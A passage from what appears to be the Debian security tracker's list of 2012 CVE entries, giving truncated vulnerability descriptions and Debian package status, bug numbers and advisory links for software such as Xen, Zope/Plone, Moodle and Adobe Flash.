does not use an expected default value during ...) - mantis 1.2.11-1.2 (bug #693283) NOTE: http://www.mantisbt.org/bugs/view.php?id=14496 CVE-2012-5521 RESERVED - quagga (bug #693102) CVE-2012-5520 (The send_to_sourcefire function in manage_sql.c in OpenVAS Manager 3.x ...) NOT-FOR-US: OpenVAS Manager CVE-2012-5519 (CUPS 1.4.4, when running in certain Linux distributions such as Debian ...) {DSA-2600-1} - cups 1.5.3-2.7 (bug #692791) NOTE: http://seclists.org/oss-sec/2012/q4/253 CVE-2012-5518 RESERVED NOT-FOR-US: ovirt / vsdm CVE-2012-5517 (The online_pages function in mm/memory_hotplug.c in the Linux kernel ...) - linux 3.2.41-1 - linux-2.6 [squeeze] - linux-2.6 (Vulnerable code not present) CVE-2012-5516 (Red Hat Enterprise Virtualization Manager (RHEV-M) before 3.1, when ...) NOT-FOR-US: Red Hat Enterprise Virtualisation Manager CVE-2012-5515 (The (1) XENMEM_decrease_reservation, (2) XENMEM_populate_physmap, and ...) {DSA-2582-1} - xen 4.1.3-5 CVE-2012-5514 (The guest_physmap_mark_populate_on_demand function in Xen 4.2 and ...) {DSA-2582-1} - xen 4.1.3-6 CVE-2012-5513 (The XENMEM_exchange handler in Xen 4.2 and earlier does not properly ...) {DSA-2582-1} - xen 4.1.3-5 CVE-2012-5512 (Array index error in the HVMOP_set_mem_access handler in Xen 4.1 ...) - xen 4.1.3-5 [squeeze] - xen (Only affects Xen 4.1) CVE-2012-5511 (Stack-based buffer overflow in the dirty video RAM tracking ...) {DSA-2636-1} - xen 4.1.3-5 CVE-2012-5510 (Xen 4.x, when downgrading the grant table version, does not properly ...) {DSA-2582-1} - xen 4.1.3-5 CVE-2012-5509 (aeolus-configserver-setup in the Aeolas Configuration Server, as used ...) NOT-FOR-US: Aeolus Cloud Configuration tool (not the pipe organ simulator in Debian) CVE-2012-5508 [ Zope/Plone: PRNG isn't reseeded ] RESERVED - zope2.12 2.12.26-1 (bug #692899) NOTE: https://plone.org/products/plone/security/advisories/20121106/24 CVE-2012-5507 [ Zope/Plone: Timing attack in password validation ] RESERVED - zope2.12 2.12.26-1 (bug #692899) NOTE: https://plone.org/products/plone/security/advisories/20121106/23 CVE-2012-5506 [ Zope/Plone: DoS through RSS on private folder ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5505 [ Zope/Plone: Attempting to access a view with no name returns an internal data structure ] RESERVED - zope2.12 2.12.26-1 (bug #692899) NOTE: https://plone.org/products/plone/security/advisories/20121106/21 CVE-2012-5504 [ Zope/Plone: Persistent XSS ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5503 [ Zope/Plone: Users connected through FTP can list hidden folder contents ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5502 [ Zope/Plone: Persistent XSS via filtering bypass ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5501 [ Zope/Plone: Crafted URL allows downloading of BLOBs that are not visible to the user ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5500 [ Zope/Plone: Anonymous users can batch change titles of content items ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5499 [ Zope/Plone: Partial denial of service through internal function ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5498 [ Zope/Plone: Partial denial of service through Collections functionality ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5497 [ Zope/Plone: Anonymous users can list user account names ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5496 [ Zope/Plone: DoS through unsanitised inputs into Kupu ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5495 [ Zope/Plone: Restricted Python injection ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5494 [ Zope/Plone: Reflexive XSS ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5493 [ Zope/Plone: Restricted Python sandbox escape ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5492 [ Zope/Plone: Partial permissions bypass ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5491 [ Zope/Plone: Form detail exposure ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5490 [ Zope/Plone: Reflexive XSS ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5489 [ Zope/Plone: Partial restricted Python sandbox escape ] RESERVED - zope2.12 (bug #692899) NOTE: https://plone.org/products/plone/security/advisories/20121106/05 CVE-2012-5488 [ Zope/Plone: Restricted Python injection ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 CVE-2012-5487 [ Zope/Plone: Restricted Python sandbox escape ] RESERVED - zope2.12 (unimportant; bug #692899) NOTE: Non-issue, see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692899#20 CVE-2012-5486 [ Zope/Plone: Reflexive HTTP header injection ] RESERVED - zope2.12 2.12.26-1 (bug #692899) NOTE: https://plone.org/products/plone/security/advisories/20121106/02 CVE-2012-5485 [ Restricted Python injection ] RESERVED NOT-FOR-US: Plone not packaged in Debian, see bug #692899 NOTE: https://plone.org/products/plone/security/advisories/20121106/01 CVE-2012-5484 (The client in FreeIPA 2.x and 3.x before 3.1.2 does not properly ...) NOT-FOR-US: FreeIPA CVE-2012-5483 (tools/sample_data.sh in OpenStack Keystone 2012.1.3, when access to ...) - keystone (Debian packaging enforces correct permissions) CVE-2012-5482 (The v2 API in OpenStack Glance Grizzly, Folsom (2012.2), and Essex ...) - glance 2012.1.1-3 (bug #692641) CVE-2012-5481 (Moodle 2.3.x before 2.3.3 allows remote authenticated users to bypass ...) - moodle (Doesn't affect 1.9 or 2.2) CVE-2012-5480 (The Database activity module in Moodle 2.1.x before 2.1.9, 2.2.x ...) - moodle 2.2.3.dfsg-2.6 [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy0 [squeeze] - moodle (Doesn't affect 1.9) CVE-2012-5479 (The Portfolio plugin in Moodle 2.1.x before 2.1.9, 2.2.x before 2.2.6, ...) - moodle 2.2.3.dfsg-2.6 [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy0 [squeeze] - moodle (Doesn't affect 1.9) CVE-2012-5478 (The AuthorizationInterceptor in JBoss Enterprise Application Platform ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2012-5477 RESERVED CVE-2012-5476 RESERVED - horizon (File is installed with 0700 perms in Debian) CVE-2012-5475 [YUI 2.x security issue regarding embedded SWF files] REJECTED CVE-2012-5474 RESERVED - horizon 2012.1.1-7 CVE-2012-5473 (The Database activity module in Moodle 2.1.x before 2.1.9, 2.2.x ...) - moodle 2.2.3.dfsg-2.6 [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy0 [squeeze] - moodle (Doesn't affect 1.9) CVE-2012-5472 (lib/formslib.php in Moodle 2.2.x before 2.2.6 and 2.3.x before 2.3.3 ...) - moodle 2.2.3.dfsg-2.6 [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy0 [squeeze] - moodle (Doesn't affect 1.9) CVE-2012-5471 (The Dropbox Repository File Picker in Moodle 2.1.x before 2.1.9, 2.2.x ...) - moodle 2.2.3.dfsg-2.6 [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy0 [squeeze] - moodle (Doesn't affect 1.9) CVE-2012-5470 (libpng_plugin in VideoLAN VLC media player 2.0.3 allows remote ...) - vlc 2.0.4-1 (bug #692130) [wheezy] - vlc 2.0.3-4 [squeeze] - vlc (Minor issue) CVE-2012-5469 (The Portable phpMyAdmin plugin before 1.3.1 for WordPress allows ...) NOT-FOR-US: Wordpress plugin CVE-2012-5468 (Heap-based buffer overflow in iconvert.c in the bogolexer component in ...) {DSA-2585-1} - bogofilter 1.2.2+dfsg1-2 (bug #695139) CVE-2012-5467 RESERVED CVE-2012-5466 RESERVED CVE-2012-5465 RESERVED CVE-2012-5464 RESERVED CVE-2012-5463 RESERVED CVE-2012-5462 RESERVED CVE-2012-5461 RESERVED CVE-2012-5460 RESERVED CVE-2012-5459 (Untrusted search path vulnerability in VMware Workstation 8.x before ...) NOT-FOR-US: VMware CVE-2012-5458 (VMware Workstation 8.x before 8.0.5 and VMware Player 4.x before 4.0.5 ...) NOT-FOR-US: VMware CVE-2012-5457 RESERVED CVE-2012-5456 (The Zoner AntiVirus Free application for Android does not verify that ...) NOT-FOR-US: Zoner AntiVirus Free CVE-2012-5455 (Cross-site scripting (XSS) vulnerability in the language search ...) NOT-FOR-US: Joomla! component CVE-2012-5454 (user/index_inline_editor_submit.php in ATutor AContent 1.2-1 does not ...) NOT-FOR-US: ATutor AContent CVE-2012-5453 (SQL injection vulnerability in user/index_inline_editor_submit.php in ...) NOT-FOR-US: ATutor AContent CVE-2012-5452 (Multiple cross-site scripting (XSS) vulnerabilities in Subrion CMS ...) NOT-FOR-US: Subrion CMS CVE-2011-5212 (SQL injection vulnerability in admin/index.php in Subrion CMS 2.0.4 ...) NOT-FOR-US: Subrion CMS CVE-2011-5211 (Cross-site scripting (XSS) vulnerability in the poll module in Subrion ...) NOT-FOR-US: Subrion CMS CVE-2012-5451 RESERVED CVE-2012-5450 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: CMS Made Simple CVE-2012-5449 RESERVED CVE-2012-5448 RESERVED CVE-2012-5447 RESERVED CVE-2012-5446 RESERVED CVE-2012-5445 (The kernel in Cisco Native Unix (CNU) on Cisco Unified IP Phone 7900 ...) NOT-FOR-US: Cisco Native Unix CVE-2012-5444 (Cisco TelePresence Video Communication Server (VCS) X7.0.3 does not ...) NOT-FOR-US: Cisco TelePresence Video Communication Server CVE-2012-5443 RESERVED CVE-2012-5442 RESERVED CVE-2012-5441 RESERVED CVE-2012-5440 RESERVED CVE-2012-5439 RESERVED CVE-2012-5438 RESERVED CVE-2012-5437 RESERVED CVE-2012-5436 RESERVED CVE-2012-5435 RESERVED CVE-2012-5434 RESERVED CVE-2012-5433 RESERVED CVE-2012-5432 RESERVED CVE-2012-5431 RESERVED CVE-2012-5430 RESERVED CVE-2012-5429 (The VPN driver in Cisco VPN Client on Windows does not properly ...) NOT-FOR-US: Cisco VPN Client CVE-2012-5428 RESERVED CVE-2012-5427 RESERVED CVE-2012-5426 RESERVED CVE-2012-5425 RESERVED CVE-2012-5424 (Cisco Secure Access Control System (ACS) 5.x before 5.2 Patch 11 and ...) NOT-FOR-US: Cisco CVE-2012-5423 RESERVED CVE-2012-5422 RESERVED CVE-2012-5421 RESERVED CVE-2012-5420 RESERVED CVE-2012-5419 (Cisco Adaptive Security Appliance (ASA) software 8.7.1 and 8.7.1.1 for ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2012-5418 RESERVED CVE-2012-5417 (Cisco Prime Data Center Network Manager (DCNM) before 6.1(1) does not ...) NOT-FOR-US: Cisco CVE-2012-5416 (Buffer overflow in Cisco Unified MeetingPlace Web Conferencing before ...) NOT-FOR-US: Cisco CVE-2012-5415 (Race condition on Cisco Adaptive Security Appliances (ASA) devices ...) NOT-FOR-US: Cisco CVE-2012-5414 RESERVED CVE-2012-5413 RESERVED CVE-2012-5412 RESERVED CVE-2012-5411 RESERVED CVE-2012-5410 RESERVED CVE-2012-5409 (AscoServer.exe in the server in Siemens SiPass integrated MP2.6 and ...) NOT-FOR-US: Siemens SiPass CVE-2012-5408 RESERVED CVE-2012-5407 RESERVED CVE-2012-5406 RESERVED CVE-2012-5405 RESERVED CVE-2012-5404 RESERVED CVE-2012-5403 RESERVED CVE-2012-5402 RESERVED CVE-2012-5401 RESERVED CVE-2012-5400 RESERVED CVE-2012-5399 RESERVED CVE-2012-5398 RESERVED CVE-2012-5397 RESERVED CVE-2012-5396 RESERVED CVE-2012-5395 RESERVED NOT-FOR-US: Mediawiki extension CentralAuth CVE-2012-5394 RESERVED CVE-2012-5393 RESERVED CVE-2012-5392 RESERVED CVE-2012-5391 RESERVED - mediawiki 1:1.19.3-1 (bug #694998) [squeeze] - mediawiki 1:1.15.5-2squeeze5 CVE-2012-5390 [Possible privilege escalation] RESERVED - condor (standard universe is disabled in the Debian package, see bug #697936) NOTE: http://research.cs.wisc.edu/htcondor/security/vulnerabilities/CONDOR-2012-0003.html CVE-2012-5389 RESERVED CVE-2012-5388 (Cross-site scripting (XSS) vulnerability in wlcms-plugin.php in the ...) NOT-FOR-US: White Label CMS CVE-2012-5387 (Cross-site request forgery (CSRF) vulnerability in wlcms-plugin.php in ...) NOT-FOR-US: WordPress plugin White Label CMS CVE-2012-5386 (Directory traversal vulnerability in index.php in phpPaleo 4.8b180 ...) NOT-FOR-US: phpPaleo CVE-2012-5385 (install/index.php in Craig Knudsen WebCalendar before 1.2.5 allows ...) - webcalendar CVE-2012-5384 (Multiple cross-site scripting (XSS) vulnerabilities in Craig Knudsen ...) - webcalendar CVE-2012-5376 (The Inter-process Communication (IPC) implementation in Google Chrome ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-5375 (The CRC32C feature in the Btrfs implementation in the Linux kernel ...) - linux 3.8-1 (unimportant) - linux-2.6 (unimportant) NOTE: btrfs support in Squeeze/Wheezy is not ready for production use CVE-2012-5374 (The CRC32C feature in the Btrfs implementation in the Linux kernel ...) - linux 3.8-1 (unimportant) - linux-2.6 (unimportant) NOTE: btrfs support in Squeeze/Wheezy is not ready for production use CVE-2012-5373 (Oracle Java SE 7 and earlier, and OpenJDK 7 and earlier, computes hash ...) - openjdk-6 - openjdk-7 CVE-2012-5372 (Rubinius computes hash values without properly restricting the ability ...) - rubinius (bug #591817) CVE-2012-5371 (Ruby (aka CRuby) 1.9 before 1.9.3-p327 and 2.0 before r37575 computes ...) - ruby1.8 (Only affects 1.9.x) - ruby1.9.1 1.9.3.194-4 (bug #693024) CVE-2012-5370 (JRuby computes hash values without properly restricting the ability to ...) - jruby 1.5.6-5 (bug #694694) [squeeze] - jruby (Non-free not supported) CVE-2012-5369 RESERVED CVE-2012-5368 (phpMyAdmin 3.5.x before 3.5.3 uses JavaScript code that is obtained ...) - phpmyadmin (Only affects 3.5.x, not packaged yet, see #691728) CVE-2012-5367 (Multiple SQL injection vulnerabilities in OrangeHRM 2.7.1 RC 1 allow ...) NOT-FOR-US: OrangeHRM CVE-2012-5366 RESERVED NOT-FOR-US: Mac OS X CVE-2012-5365 RESERVED - kfreebsd-8 (low; bug #690986) - kfreebsd-9 (low) [squeeze] - kfreebsd-8 (Minor issue) [squeeze] - kfreebsd-9 (Minor issue) [wheezy] - kfreebsd-8 (Minor issue) [wheezy] - kfreebsd-9 (Minor issue) CVE-2012-5364 RESERVED NOT-FOR-US: Microsoft Windows CVE-2012-5363 RESERVED - kfreebsd-8 (low; bug #690986) [squeeze] - kfreebsd-8 (Minor issue) [squeeze] - kfreebsd-9 (Minor issue) [wheezy] - kfreebsd-8 (Minor issue) [wheezy] - kfreebsd-9 (Minor issue) - kfreebsd-9 (low) CVE-2012-5362 RESERVED NOT-FOR-US: Microsoft Windows CVE-2012-5361 RESERVED - ffmpeg - libav 6:0.8.5-1 (bug #694483) NOTE: http://technet.microsoft.com/en-us/security/msvr/msvr12-017 NOTE: upstream needs a proper sample to reproduce the issue CVE-2012-5360 RESERVED - ffmpeg - libav 6:0.8.5-1 (bug #694483) NOTE: http://technet.microsoft.com/en-us/security/msvr/msvr12-017 NOTE: upstream needs a proper sample to reproduce the issue CVE-2012-5359 RESERVED - ffmpeg - libav 6:0.8.5-1 (bug #694483) NOTE: http://technet.microsoft.com/en-us/security/msvr/msvr12-017 NOTE: upstream needs a proper sample to reproduce the issue CVE-2012-5358 RESERVED CVE-2012-5357 RESERVED CVE-2012-5356 (The apt-add-repository tool in Ubuntu Software Properties 0.75.x ...) NOT-FOR-US: apt-add-repository CVE-2012-5355 (welcome.py in xdiagnose before 2.5.2ubuntu0.1 allows local users to ...) NOT-FOR-US: xdiagnose CVE-2012-5354 (Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey ...) - iceape (Only affects 16.x release from experimental) - iceweasel (Only affects 16.x release from experimental) - icedove (Only affects 16.x release from experimental) CVE-2012-5383 (** DISPUTED ** Untrusted search path vulnerability in the installation ...) - mysql-5.1 (Windows issue only) - mysql-5.5 (Windows issue only) CVE-2012-5382 (** DISPUTED ** Untrusted search path vulnerability in the installation ...) NOT-FOR-US: Zend Server CVE-2012-5381 (** DISPUTED ** Untrusted search path vulnerability in the installation ...) - php5 (Windows issue only) CVE-2012-5380 (** DISPUTED ** Untrusted search path vulnerability in the installation ...) - ruby1.8 (Windows issue only) - ruby1.9.1 (Windows issue only) CVE-2012-5379 (** DISPUTED ** Untrusted search path vulnerability in the installation ...) NOT-FOR-US: ActivePython CVE-2012-5378 (Untrusted search path vulnerability in the installation functionality ...) NOT-FOR-US: ActiveTcl CVE-2012-5377 (Untrusted search path vulnerability in the installation functionality ...) NOT-FOR-US: ActivePerl CVE-2012-5353 (Eduserv OpenAthens SP 2.0 for Java allows remote attackers to forge ...) NOT-FOR-US: Eduserv CVE-2012-5352 (Java Open Single Sign-On Project Home (JOSSO) allows remote attackers ...) NOT-FOR-US: josso CVE-2012-5351 (Apache Axis2 allows remote attackers to forge messages and bypass ...) - axis2c (low; bug #690421) CVE-2012-5350 (SQL injection vulnerability in the Pay With Tweet plugin before 1.2 ...) NOT-FOR-US: wp Pay With Tweet plugin CVE-2012-5349 (Multiple cross-site scripting (XSS) vulnerabilities in pay.php in the ...) NOT-FOR-US: wp Pay With Tweet plugin CVE-2012-5348 (SQL injection vulnerability in MangosWeb Enhanced 3.0.3 allows remote ...) NOT-FOR-US: MangosWeb CVE-2012-5347 (TinyWebGallery 1.8.3 allows remote attackers to execute arbitrary code ...) NOT-FOR-US: TinyWebGallery CVE-2012-5346 (Cross-site scripting (XSS) vulnerability in wp-live.php in the WP ...) NOT-FOR-US: WP live plugin CVE-2012-5345 (Buffer overflow in the Remote command server (Rcmd.bat) in IpTools ...) NOT-FOR-US: batch file CVE-2012-5344 (Directory traversal vulnerability in the WebServer (Thttpd.bat) in ...) NOT-FOR-US: batch file CVE-2012-5343 (Cross-site scripting (XSS) vulnerability in admin/login.php in Limny ...) NOT-FOR-US: Limny CVE-2012-5342 (Multiple SQL injection vulnerabilities in SenseSites CommonSense CMS ...) NOT-FOR-US: SenseSites CommonSense CVE-2012-5341 (Multiple cross-site scripting (XSS) vulnerabilities in statistik.php ...) NOT-FOR-US: Otterware StatIt CVE-2011-5210 (Directory traversal vulnerability in admin/preview.php in Limny 3.0.0 ...) NOT-FOR-US: Limny CVE-2011-5209 (Cross-site scripting (XSS) vulnerability in search/ in GraphicsClone ...) NOT-FOR-US: GraphicsClone CVE-2012-5340 RESERVED CVE-2012-5339 (Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin ...) - phpmyadmin (Only affects 3.5.x, not packaged yet, see #691728) CVE-2012-5338 RESERVED CVE-2012-5337 (Multiple cross-site scripting (XSS) vulnerabilities in jforum.page in ...) NOT-FOR-US: jForum CVE-2012-5336 RESERVED CVE-2012-5335 (Directory traversal vulnerability in Tiny Server 1.1.5 allows remote ...) NOT-FOR-US: Tiny Server CVE-2012-5334 (SQL injection vulnerability in product_desc.php in Pre Printing Press ...) NOT-FOR-US: Pre Printing Press CVE-2012-5333 (SQL injection vulnerability in page.php in Pre Printing Press allows ...) NOT-FOR-US: Pre Printing Press CVE-2012-5332 (at32 Reverse Proxy 1.060.310 allows remote attackers to cause a denial ...) NOT-FOR-US: at32 Reverse Proxy CVE-2012-5331 (Directory traversal vulnerability in asaanCart 0.9 allows remote ...) NOT-FOR-US: asaanCart CVE-2012-5330 (Multiple cross-site scripting (XSS) vulnerabilities in asaanCart 0.9 ...) NOT-FOR-US: asaanCart CVE-2012-5329 (Buffer overflow in TYPSoft FTP Server 1.1 allows remote authenticated ...) NOT-FOR-US: TYPSoft FTP CVE-2012-5328 (Multiple SQL injection vulnerabilities in the Mingle Forum plugin ...) NOT-FOR-US: WP Mingle Forum CVE-2012-5327 (Multiple SQL injection vulnerabilities in fs-admin/fs-admin.php in the ...) NOT-FOR-US: WP Mingle Forum CVE-2012-5326 (Cross-site request forgery (CSRF) vulnerability in admin/function.php ...) NOT-FOR-US: IDevSpot iSupport CVE-2012-5325 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: WP Shortcode CVE-2012-5324 (Multiple buffer overflows in the Pdf Printer Preferences ActiveX ...) NOT-FOR-US: PDF-XChange CVE-2012-5323 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: Xavi ADSL router CVE-2012-5322 (Multiple cross-site scripting (XSS) vulnerabilities in Xavi X7968 ...) NOT-FOR-US: Xavi ADSL router CVE-2012-5321 (tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote ...) - tikiwiki CVE-2012-5320 (Cross-site request forgery (CSRF) vulnerability in password.cgi in ...) NOT-FOR-US: Sagem CVE-2012-5319 (Cross-site request forgery (CSRF) vulnerability in setup/security.cgi ...) NOT-FOR-US: D-link CVE-2012-5318 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: WP Kish CVE-2012-5317 (SQL injection vulnerability in main_bigware_43.php in Bigware Shop ...) NOT-FOR-US: Bigware Shop CVE-2012-5316 (Multiple cross-site scripting (XSS) vulnerabilities in Barracuda Spam ...) NOT-FOR-US: Barracuda CVE-2012-5315 (Multiple cross-site scripting (XSS) vulnerabilities in php ireport 1.0 ...) NOT-FOR-US: iReport CVE-2012-5314 (Cross-site scripting (XSS) vulnerability in ViewGit 0.0.6 and earlier ...) NOT-FOR-US: ViewGit CVE-2012-5313 (SQL injection vulnerability in forum.asp in Snitz Forums 2000 allows ...) NOT-FOR-US: Snitz Forums CVE-2012-5312 (SQL injection vulnerability in Tribiq CMS allows remote attackers to ...) NOT-FOR-US: Tribiq CMS CVE-2012-5311 REJECTED CVE-2012-5310 (SQL injection vulnerability in the WP e-Commerce plugin before 3.8.7.6 ...) NOT-FOR-US: WP e-Commerce plugin CVE-2012-5309 (servlet/traveler in IBM Lotus Notes Traveler through 8.5.3.3 Interim ...) NOT-FOR-US: Lotus Notes CVE-2012-5308 (Cross-site request forgery (CSRF) vulnerability in servlet/traveler in ...) NOT-FOR-US: Lotus Notes CVE-2012-5307 (Cross-site scripting (XSS) vulnerability in servlet/traveler in IBM ...) NOT-FOR-US: Lotus Notes CVE-2012-5306 (Stack-based buffer overflow in the SelectDirectory method in ...) NOT-FOR-US: D-Link CVE-2012-5305 (Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC ...) NOT-FOR-US: DirectAdmin CVE-2012-5304 (Static code injection vulnerability in administration/install.php in ...) NOT-FOR-US: YVS CVE-2012-5303 (Monkey HTTP Daemon 0.9.3 might allow local users to overwrite ...) - monkey (unimportant) CVE-2012-5302 (The server in TIBCO Formvine 3.1.x and 3.2.x before 3.2.1 does not ...) NOT-FOR-US: TIBCO Formvine CVE-2011-5208 (Multiple directory traversal vulnerabilities in the BackWPup plugin ...) NOT-FOR-US: BackWPup CVE-2010-5279 (article.php in Virtual War (aka VWar) 1.6.1 R2 allows remote attackers ...) NOT-FOR-US: VWar CVE-2010-5278 (Directory traversal vulnerability in ...) NOT-FOR-US: MODx Revolution CVE-2010-5277 (Unspecified vulnerability in the Views Bulk Operations module 6 before ...) NOT-FOR-US: Drupal Views Bulk Operations CVE-2010-5276 (The Memcache module 5.x before 5.x-1.10 and 6.x before 6.x-1.6 for ...) NOT-FOR-US: Drupal Memcache CVE-2010-5275 (Cross-site scripting (XSS) vulnerability in memcache_admin in the ...) NOT-FOR-US: Drupal Memcache CVE-2012-5301 (The default configuration of Cerberus FTP Server before 5.0.4.0 ...) NOT-FOR-US: Cerberus CVE-2012-5300 (SQL injection vulnerability in art_catalogo.php in MyStore Xpress ...) NOT-FOR-US: MyStore Xpress CVE-2012-5299 (Mavili Guestbook, as released in November 2007, allows remote attackers to ...) NOT-FOR-US: Mavili Guestbook CVE-2012-5298 (Mavili Guestbook, as released in November 2007, stores guestbook.mdb under ...) NOT-FOR-US: Mavili Guestbook CVE-2012-5297 (SQL injection vulnerability in edit.asp in Mavili Guestbook, as ...) NOT-FOR-US: Mavili Guestbook CVE-2012-5296 (Multiple cross-site scripting (XSS) vulnerabilities in Mavili ...) NOT-FOR-US: Mavili Guestbook CVE-2012-5295 (Cross-site scripting (XSS) vulnerability in login.cfm in FuseTalk ...) NOT-FOR-US: FuseTalk CVE-2012-5294 (SQL injection vulnerability in art_detalle.php in MyStore Xpress ...) NOT-FOR-US: MyStore Xpress CVE-2012-5293 (Multiple PHP remote file inclusion vulnerabilities in SAPID CMS 1.2.3 ...) NOT-FOR-US: SAPID CMS CVE-2012-5292 (Multiple SQL injection vulnerabilities in Atar2b CMS 4.0.1 allow ...) NOT-FOR-US: Atar2b CVE-2012-5291 (SQL injection vulnerability in team.php in Posse Softball Director CMS ...) NOT-FOR-US: Posse Softball Director CVE-2012-5290 (Multiple SQL injection vulnerabilities in EasyWebRealEstate allow ...) NOT-FOR-US: EasyWebRealEstate CVE-2012-5289 (Multiple SQL injection vulnerabilities in Plogger 1.0 RC1 allow remote ...) NOT-FOR-US: Plogger CVE-2012-5288 (SQL injection vulnerability in page.php in phpMyDirectory 1.3.3 allows ...) NOT-FOR-US: phpMyDirectory CVE-2011-5207 (Cross-site scripting (XSS) vulnerability in admin/OptionsPostsList.php ...) NOT-FOR-US: WP TheCartPress CVE-2011-5206 (Cross-site scripting (XSS) vulnerability in notes.php in Rapidleech ...) NOT-FOR-US: Rapidleech CVE-2011-5205 (Cross-site scripting (XSS) vulnerability in audl.php in Rapidleech 2.3 ...) NOT-FOR-US: Rapidleech CVE-2011-5204 (Akiva WebBoard 8.x stores passwords in plaintext, which allows local ...) NOT-FOR-US: Akiva WebBoard CVE-2011-5203 (SQL injection vulnerability in WB/Default.asp in Akiva WebBoard before ...) NOT-FOR-US: Akiva WebBoard CVE-2012-XXXX [gunicorn fails to drop supplemental groups] - gunicorn 0.14.5-3 (low) [squeeze] - gunicorn (Minor issue) CVE-2012-5287 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5286 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5285 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5284 RESERVED CVE-2012-5283 RESERVED CVE-2012-5282 RESERVED CVE-2012-5281 RESERVED CVE-2012-5280 (Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5279 (Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5278 (Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5277 (Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5276 (Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5275 (Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5274 (Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5273 (Buffer overflow in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-5272 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5271 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5270 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5269 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5268 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5267 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5266 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5265 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5264 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5263 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5262 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5261 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5260 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5259 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5258 (Adobe Flash Player before 10.3.183.29 and 11.x before 